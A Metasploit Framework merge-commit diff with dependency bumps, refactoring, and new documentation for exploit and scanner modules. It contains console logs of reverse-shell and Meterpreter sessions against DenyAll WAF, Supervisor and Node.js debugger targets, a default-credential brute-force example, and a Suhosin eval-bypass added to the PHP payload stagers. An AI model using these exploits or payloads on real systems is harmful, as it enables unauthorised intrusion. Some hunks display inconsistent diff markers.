Merge branch 'master' into fix_nmap_imports

bringing branch up to date
2017-09-27 12:52:27 -05:00 · 2017-09-27 12:52:27 -05:00 · f777e2ab3b
parent 51c1cddb5c e39b7fd859
commit f777e2ab3b
203 changed files with 1299 additions and 458 deletions
--- a/.ruby-version
+++ b/.ruby-version
@ -1 +1 @@
-2.4.1
+2.4.2
--- a/.travis.yml
+++ b/.travis.yml
@ -12,8 +12,8 @@ addons:
 language: ruby
 rvm:
  - '2.2'
-  - '2.3.4'
+  - '2.3.5'
-  - '2.4.1'
+  - '2.4.2'
 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
--- a/2
+++ b/2
@ -1,4 +1,4 @@
-FROM ruby:2.4.1-alpine
+FROM ruby:2.4.2-alpine
 MAINTAINER Rapid7
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
--- a/Gemfile.lock
+++ b/Gemfile.lock
@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.16.8)
+    metasploit-framework (4.16.9)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@ -17,7 +17,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.7)
+      metasploit-payloads (= 1.3.8)
      metasploit_data_models
      metasploit_payloads-mettle (= 0.2.2)
      msgpack
@ -150,7 +150,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.7)
+    metasploit-payloads (1.3.8)
    metasploit_data_models (2.0.15)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@ -163,7 +163,7 @@ GEM
      recog (~> 2.0)
    metasploit_payloads-mettle (0.2.2)
    method_source (0.8.2)
-    mini_portile2 (2.2.0)
+    mini_portile2 (2.3.0)
    minitest (5.10.3)
    msgpack (1.1.0)
    multipart-post (2.0.0)
@ -171,8 +171,8 @@ GEM
    net-ssh (4.2.0)
    network_interface (0.0.2)
    nexpose (7.0.1)
-    nokogiri (1.8.0)
+    nokogiri (1.8.1)
-      mini_portile2 (~> 2.2.0)
+      mini_portile2 (~> 2.3.0)
    octokit (4.7.0)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.1)
@ -193,10 +193,9 @@ GEM
      activerecord (>= 4.0.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
-    pry (0.10.4)
+    pry (0.11.0)
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
    public_suffix (3.0.0)
    rack (1.6.8)
    rack-test (0.6.3)
@ -308,7 +307,6 @@ GEM
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.2)
    slop (3.6.0)
    sqlite3 (1.3.13)
    sshkey (1.9.0)
    thor (0.20.0)
--- a/documentation/modules/auxiliary/scanner/http/buildmaster_login.md
+++ b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md
@ -0,0 +1,59 @@
 ## Description
 This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
 The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
 ## Vulnerable Application
 [Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
 [Inedo website](http://inedo.com/)
 ## Verification Steps
 1. Do: ```use auxiliary/scanner/http/buildmaster_login```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [PORT]```
 4. Do: Set credentials
 5. Do: ```run```
 6. You should see the module attempting to log in.
 ## Scenarios
 ### Attempt to login with the default credentials.
 ```
 msf > use auxiliary/scanner/http/buildmaster_login
 msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
 RHOSTS => 10.0.0.39
 msf auxiliary(buildmaster_login) > run
 [+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
 [*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
 [+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(buildmaster_login) >
 ```
 ### Brute force with credentials from file.
 ```
 msf > use auxiliary/scanner/http/buildmaster_login 
 msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
 RHOSTS => 10.0.0.39
 msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
 USERPASS_FILE => ~/BuildMasterCreds.txt
 msf auxiliary(buildmaster_login) > run
 [+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
 [*] 10.0.0.39:81          - Trying username:"Admin" with password:"test"
 [-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"test"
 [*] 10.0.0.39:81          - Trying username:"Admin" with password:"wrong"
 [-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"wrong"
 [*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
 [+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(buildmaster_login) > 
 ```
--- a/documentation/modules/auxiliary/scanner/smb/smb1.md
+++ b/documentation/modules/auxiliary/scanner/smb/smb1.md
@ -0,0 +1,55 @@
 # Description
 This module scans for hosts that support the SMBv1 protocol.  It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
 ```PC NETWORK PROGRAM 1.0
 LANMAN1.0
 Windows for Workgroups 3.1a
 LM1.2X002
 LANMAN2.1
 NT LM 0.12
 ```
 If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
 If the SMB server does not support SMBv1 a RST will be sent.
 ___
 # Usage
 The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
 #### A host that does support SMBv1.
 ```
 msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
 msf auxiliary(smb1) > set RHOSTS x.x.x.x
 RHOSTS => x.x.x.x
 msf auxiliary(smb1) > run
 [+] x.x.x.x:445        - x.x.x.x supports SMBv1 dialect.
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(smb1) > services -S x.x.x.x
 Services
 ========
 host        port  proto  name  state  info
 ----        ----  -----  ----  -----  ----
 x.x.x.x 445   tcp    smb1  open
 ```
 #### A host that does not support SMBv1
 ```
 msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
 msf auxiliary(smb1) > set RHOSTS y.y.y.y
 RHOSTS => y.y.y.y
 msf auxiliary(smb1) > run
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
 ___
 ## Options
 The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation.  It can also be set using hosts from the database using ```hosts -R```.
--- a/documentation/modules/exploit/linux/http/denyall_waf_exec.md
+++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
@ -0,0 +1,47 @@
 ## Vulnerable Application
 This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
 It's possible to have trial demo for 15 days at Amazon Marketplace.
 [https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
 You just need to follow instruction above URL.
 ## Verification Steps
 A successful check of the exploit will look like this:
 - [ ] Start `msfconsole`
 - [ ] `use use exploit/linux/http/denyall_exec`
 - [ ] Set `RHOST`
 - [ ] Set `LHOST`
 - [ ] Run `check`
 - [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
 - [ ] Run `exploit`
 - [ ] **Verify** that you are seeing `iToken` value extraction.
 - [ ] **Verify** that you are getting `meterpreter` session.
 ## Scenarios
 ```
 msf > use exploit/linux/http/denyall_exec 
 msf exploit(denyall_exec) > 
 msf exploit(denyall_exec) > set RHOST 35.176.123.128
 RHOST => 35.176.123.128
 msf exploit(denyall_exec) > set LHOST 35.12.3.3
 LHOST => 35.12.3.3
 msf exploit(denyall_exec) > check
 [*] 35.176.123.128:3001 The target appears to be vulnerable.
 msf exploit(denyall_exec) > exploit 
 [*] Started reverse TCP handler on 35.12.3.3:4444 
 [*] Extracting iToken value from unauthenticated accessible endpoint.
 [+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
 [*] Trigerring command injection vulnerability with  iToken value.
 [*] Sending stage (40411 bytes) to 35.176.123.128
 [*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
 meterpreter > pwd
 /var/log/denyall/reverseproxy
 meterpreter >
 ```
--- a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
+++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
@ -0,0 +1,78 @@
 ## Vulnerable Application
  This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
  This has been tested with versions 3.2.0 and 3.3.2
 ### Creating A Testing Environment
  At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
  1. ```sudo apt-get install supervisor```
  2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
    ```
    [inet_http_server]         ; inet (TCP) server disabled by default
    port=:9001        ; ip_address:port specifier, *:port for all iface
    username=user              ; default is no username (open server)
    password=123               ; default is no password (open server)
    ```
  3. Restart the service: `sudo service supervisor restart`
 ## Verification Steps
  1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
  2. ```set lhost [IP]```
  3. ```set rhost [IP]```
  4. ```set httpusername user```
  5. ```set httppassword 123```
  6. ```exploit```
  7. A meterpreter session should have been opened successfully
 ## Options
  **HttpUsername**
  Username for HTTP basic auth which is set in the conf file(optional)
  **HttpPassword**
  Password for HTTP basic auth which is set in the conf file(optional)
  **TARGETURI**
  The path to the XML-RPC endpoint
 ## Scenarios
 ### Supervisor 3.2.0 on Xubuntu 16.04
 ```
 msf > use exploit/linux/http/supervisor_xmlrpc_exec 
 msf exploit(supervisor_xmlrpc_exec) > set httpusername user
 httpusername => user
 msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
 httppassword => 123
 msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
 lhost => 192.168.0.2
 msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
 rhost => 192.168.0.19
 msf exploit(supervisor_xmlrpc_exec) > check 
 [*] Extracting version from web interface..
 [*] Using basic auth (user:123)
 [+] Vulnerable version found: 3.2.0
 [*] 192.168.0.19:9001 The target appears to be vulnerable.
 msf exploit(supervisor_xmlrpc_exec) > exploit 
 [*] Started reverse TCP handler on 192.168.0.2:4444 
 [*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
 [*] Using basic auth (user:123)
 [*] Sending stage (2878872 bytes) to 192.168.0.19
 [*] Command Stager progress - 100.00% done (782/782 bytes)
 [+] Request timeout, usually indicates success. Passing to handler..
 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
 meterpreter > 
 ```
--- a/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md
+++ b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md
@ -0,0 +1,64 @@
 ## Vulnerable Application
 Current and historical versions of node (or any JS env based on the 
 V8 JS engine) have this functionality and could be exploitable if
 configured to expose the JS port on an untrusted interface.
 Install a version of node using any of the normal methods: 
 * Vendor: https://nodejs.org/en/download/package-manager/
 * Distro: `sudo apt-get install nodejs` 
 Alternately, use standard node docker containers as targets:
 ```
 $ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
 ```
 (Others at https://hub.docker.com/_/node/)
 Tested on Node 7.x, 6.x, 4.x
 ## Verification Steps
 1. Run a node process exposing the debug port
 ```
 node --debug=0.0.0.0:5858 
 ```
 2. Exploit it and catch the callback:
 ```
 msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
 ```
 (If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
 Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity 
 (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
 ## Scenarios
 ### Example Run (Node 7.x)
 Victim:
 ```
 $ node --version
 v7.10.0
 $ node --debug=0.0.0.0:5858
 (node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
 Debugger listening on 0.0.0.0:5858
 >
 (To exit, press ^C again or type .exit)
 ```
 Attacker:
 ```
 msf exploit(nodejs_v8_debugger) > exploit
 [*] Started reverse TCP handler on 10.0.0.141:4444
 [*] 127.0.0.1:5858 - Sending 745 byte payload...
 [*] 127.0.0.1:5858 - Got success response
 [*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
 id
 (redacted)
 ``` 
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@ -30,7 +30,7 @@ module Metasploit
        end
      end
-      VERSION = "4.16.8"
+      VERSION = "4.16.9"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@ -3,30 +3,74 @@
 require 'shellwords'
 module Msf
-module Sessions
+  module Sessions
-module MeterpreterOptions
+    #
    # Defines common options across all Meterpreter implementations
    #
    module MeterpreterOptions
-  def initialize(info = {})
+      TIMEOUT_SESSION = 24 * 3600 * 7  # 1 week
-    super(info)
+      TIMEOUT_COMMS = 300              # 5 minutes
      TIMEOUT_RETRY_TOTAL = 60 * 60    # 1 hour
      TIMEOUT_RETRY_WAIT = 10          # 10 seconds
-    register_advanced_options(
+      def initialize(info = {})
-      [
+        super(info)
-        OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
+
-        OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
+        register_advanced_options(
-        OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]),
+          [
-        OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
+            OptBool.new(
-        OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
+              'AutoLoadStdapi',
-        OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
+              [true, "Automatically load the Stdapi extension", true]
-        OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
+            ),
-        OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
+            OptBool.new(
-        OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
+              'AutoVerifySession',
-        OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
+              [true, "Automatically verify and drop invalid sessions", true]
-        OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),
+            ),
-        OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS])
+            OptInt.new(
-      ], self.class)
+              'AutoVerifySessionTimeout',
              [false, "Timeout period to wait for session validation to occur, in seconds", 30]
            ),
            OptString.new(
              'InitialAutoRunScript',
              [false, "An initial script to run on session creation (before AutoRunScript)", '']
            ),
            OptString.new(
              'AutoRunScript',
              [false, "A script to run automatically on session creation.", '']
            ),
            OptBool.new(
              'AutoSystemInfo',
              [true, "Automatically capture system information on initialization.", true]
            ),
            OptBool.new(
              'EnableUnicodeEncoding',
              [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]
            ),
            OptPath.new(
              'HandlerSSLCert',
              [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]
            ),
            OptInt.new(
              'SessionRetryTotal',
              [false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL]
            ),
            OptInt.new(
              'SessionRetryWait',
              [false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT]
            ),
            OptInt.new(
              'SessionExpirationTimeout',
              [ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION]
            ),
            OptInt.new(
              'SessionCommunicationTimeout',
              [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS]
            )
          ],
          self.class
        )
      end
    end
  end
 end
 end
 end
--- a/lib/msf/core/exploit/http/wordpress/helpers.rb
+++ b/lib/msf/core/exploit/http/wordpress/helpers.rb
@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  # @param pass [String] Password
  # @param redirect URL [String] to redirect after successful login
  # @return [Hash] The post data for vars_post Parameter
-  def wordpress_helper_login_post_data(user, pass, redirect=nil)
+  def wordpress_helper_login_post_data(user, pass, redirect = nil)
    post_data = {
-        'log' => user.to_s,
+      'log' => user.to_s,
-        'pwd' => pass.to_s,
+      'pwd' => pass.to_s,
-        'redirect_to' => redirect.to_s,
+      'redirect_to' => redirect.to_s,
-        'wp-submit' => 'Login'
+      'wp-submit' => 'Login'
    }
    post_data
  end
@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  # @return [String,nil] The location of the new comment/post, nil on error
  def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
    vars_post = {
-        'comment' => comment,
+      'comment' => comment,
-        'submit' => 'Post+Comment',
+      'submit' => 'Post+Comment',
-        'comment_post_ID' => comment_post_id.to_s,
+      'comment_post_ID' => comment_post_id.to_s,
-        'comment_parent' => '0'
+      'comment_parent' => '0'
    }
    vars_post.merge!({
-        'author' => author,
+      'author' => author,
-        'email' => email,
+      'email' => email,
-        'url' => url,
+      'url' => url
    }) unless login_cookie
    options = {
-        'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
+      'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
-        'method' => 'POST'
+      'method' => 'POST'
    }
-    options.merge!({'vars_post' => vars_post})
+    options.merge!({ 'vars_post' => vars_post })
-    options.merge!({'cookie' => login_cookie}) if login_cookie
+    options.merge!({ 'cookie' => login_cookie }) if login_cookie
    res = send_request_cgi(options)
    if res && res.redirect? && res.redirection
      return wordpress_helper_parse_location_header(res)
@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  # @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
  # @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
  # @return [Integer,nil] The post id, nil when nothing found
-  def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil)
+  def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil)
    range.each { |id|
      vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
      body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  # @param comments_enabled [Boolean] Check if comments are enabled on this post
  # @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
  # @return [String,nil] the HTTP response body of the post, nil otherwise
-  def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
+  def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil)
    options = {
-        'method' => 'GET',
+      'method' => 'GET',
-        'uri' => uri
+      'uri' => uri
    }
-    options.merge!({'cookie' => login_cookie}) if login_cookie
+    options.merge!({ 'cookie' => login_cookie }) if login_cookie
    res = send_request_cgi(options)
    # post exists
-    if res and res.code == 200
+    if res && res.code == 200
      # also check if comments are enabled
      if comments_enabled
        if res.body =~ /form.*action.*wp-comments-post\.php/
@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  #
  # @param cookie [String] A valid admin session cookie
  # @return [String,nil] The nonce, nil on error
-  def wordpress_helper_get_plugin_upload_nonce(cookie)
+  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
-    uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
+    uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
    options = {
      'method'    => 'GET',
      'uri'       => uri,
@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
    res = send_request_cgi(options)
    if res && res.code == 200
      return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
    elsif res && res.redirect? && res.redirection
      path = wordpress_helper_parse_location_header(res)
      return wordpress_helper_get_plugin_upload_nonce(cookie, path)
    end
  end
 end
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@ -41,7 +41,10 @@ class Msf::Payload::Apk
    application = amanifest.xpath('//application')
    application_name = application.attribute("name")
    if application_name
-      return application_name.to_s
+      application_str = application_name.to_s
      unless application_str == 'android.app.Application'
        return application_str
      end
    end
    activities = amanifest.xpath("//activity|//activity-alias")
    for activity in activities
@ -221,7 +224,7 @@ class Msf::Payload::Apk
    FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
    package = amanifest.xpath("//manifest").first['package']
-    package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
+    package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
    classes = {}
    classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
    classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@ -31,7 +31,7 @@ module Payload::Linux::BindTcp
    # Generate the more advanced stager if we have the space
    if self.available_space && required_space <= self.available_space
-      conf[:exitfunk] = datastore['EXITFUNC'],
+      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end
--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@ -109,7 +109,15 @@ while (strlen($b) < $len) {
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
 { 
  $suhosin_bypass=create_function('', $b); 
  $suhosin_bypass(); 
 } 
 else 
 { 
  eval($b); 
 }
 die();^
  end
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@ -102,7 +102,15 @@ while (strlen($b) < $len) {
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) 
 { 
  $suhosin_bypass=create_function('', $b); 
  $suhosin_bypass(); 
 } 
 else 
 { 
  eval($b); 
 }
 die();^
  end
--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@ -35,7 +35,7 @@ module Payload::Windows::BindTcp
    # Generate the more advanced stager if we have the space
    if self.available_space && required_space <= self.available_space
-      conf[:exitfunk] = datastore['EXITFUNC'],
+      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end
--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4
    # Generate the more advanced stager if we have the space
    if self.available_space && required_space <= self.available_space
-      conf[:exitfunk] = datastore['EXITFUNC'],
+      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end
--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64
    # Generate the more advanced stager if we have the space
    if self.available_space && required_space <= self.available_space
-      conf[:exitfunk] = datastore['EXITFUNC'],
+      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end
--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@ -40,14 +40,17 @@ module Msf::Post::Unix
  #
  def get_groups
    groups = []
-    cmd_out = read_file("/etc/group").split("\n")
+    group = '/etc/group'
-    cmd_out.each do |l|
+    if file_exist?(group)
-      entry = {}
+      cmd_out = read_file(group).split("\n")
-      user_field = l.split(":")
+      cmd_out.each do |l|
-      entry[:name] = user_field[0]
+        entry = {}
-      entry[:gid] = user_field[2]
+        user_field = l.split(":")
-      entry[:users] = user_field[3]
+        entry[:name] = user_field[0]
-      groups << entry
+        entry[:gid] = user_field[2]
        entry[:users] = user_field[3]
        groups << entry
      end
    end
    return groups
  end
@ -59,8 +62,11 @@ module Msf::Post::Unix
    user_dirs = []
    # get all user directories from /etc/passwd
-    read_file("/etc/passwd").each_line do |passwd_line|
+    passwd = '/etc/passwd'
-      user_dirs << passwd_line.split(/:/)[5]
+    if file_exist?(passwd)
      read_file(passwd).each_line do |passwd_line|
        user_dirs << passwd_line.split(/:/)[5]
      end
    end
    # also list other common places for home directories in the event that
--- a/lib/msf/ui/console/command_dispatcher/modules.rb
+++ b/lib/msf/ui/console/command_dispatcher/modules.rb
@ -66,23 +66,26 @@ module Msf
          end
          def cmd_edit_help
-            msg = "Edit the currently active module"
+            print_line "Usage: edit [file/to/edit.rb]"
            msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}."
            print_line "Usage: edit"
            print_line
-            print_line msg
+            print_line "Edit a local file or the currently active module with #{local_editor}"
-            print_line "When done editing, you must reload the module with 'reload' or 'rerun'."
+            print_line "If a file path is specified it will automatically be reloaded after editing"
            print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'."
            print_line
          end
          #
          # Edit the currently active module
          #
-          def cmd_edit
+          def cmd_edit(*args)
-            if active_module
+            if args.length > 0
-              editor = local_editor
+              path = args[0]
-              path   = active_module.file_path
+            elsif active_module
              path = active_module.file_path
            end
            if path
              editor = local_editor
              if editor.nil?
                editor = 'vim'
                print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.")
@ -90,6 +93,10 @@ module Msf
              print_status("Launching #{editor} #{path}")
              system(editor, path)
              if args.length > 0
                load args[0]
              end
            else
              print_error('Nothing to edit -- try using a module first.')
            end
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@ -34,24 +34,12 @@ module Meterpreter
 ###
 class ClientCore < Extension
-  UNIX_PATH_MAX = 108
+  VALID_TRANSPORTS = [
-  DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
+    'reverse_tcp',
-
+    'reverse_http',
-  METERPRETER_TRANSPORT_SSL   = 0
+    'reverse_https',
-  METERPRETER_TRANSPORT_HTTP  = 1
+    'bind_tcp'
-  METERPRETER_TRANSPORT_HTTPS = 2
+  ]
  TIMEOUT_SESSION = 24*3600*7  # 1 week
  TIMEOUT_COMMS = 300          # 5 minutes
  TIMEOUT_RETRY_TOTAL = 60*60  # 1 hour
  TIMEOUT_RETRY_WAIT = 10      # 10 seconds
  VALID_TRANSPORTS = {
    'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
    'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
    'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
    'bind_tcp'      => METERPRETER_TRANSPORT_SSL
  }
  include Rex::Payloads::Meterpreter::UriChecksum
@ -577,46 +565,12 @@ class ClientCore < Extension
      raise RuntimeError, 'Cannot migrate into current process', caller
    end
    if client.platform == 'linux'
      if writable_dir.to_s.strip.empty?
        writable_dir = tmp_folder
      end
      stat_dir = client.fs.filestat.new(writable_dir)
      unless stat_dir.directory?
        raise RuntimeError, "Directory #{writable_dir} not found", caller
      end
      # Rex::Post::FileStat#writable? isn't available
    end
    migrate_stub = generate_migrate_stub(target_process)
    migrate_payload = generate_migrate_payload(target_process)
    # Build the migration request
    request = Packet.create_request('core_migrate')
    if client.platform == 'linux'
      socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
      if socket_path.length > UNIX_PATH_MAX - 1
        raise RuntimeError, 'The writable dir is too long', caller
      end
      pos = migrate_payload.index(DEFAULT_SOCK_PATH)
      if pos.nil?
        raise RuntimeError, 'The meterpreter binary is wrong', caller
      end
      migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00"
      ep = elf_ep(migrate_payload)
      request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
      request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
      request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
    end
    request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
    request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length)
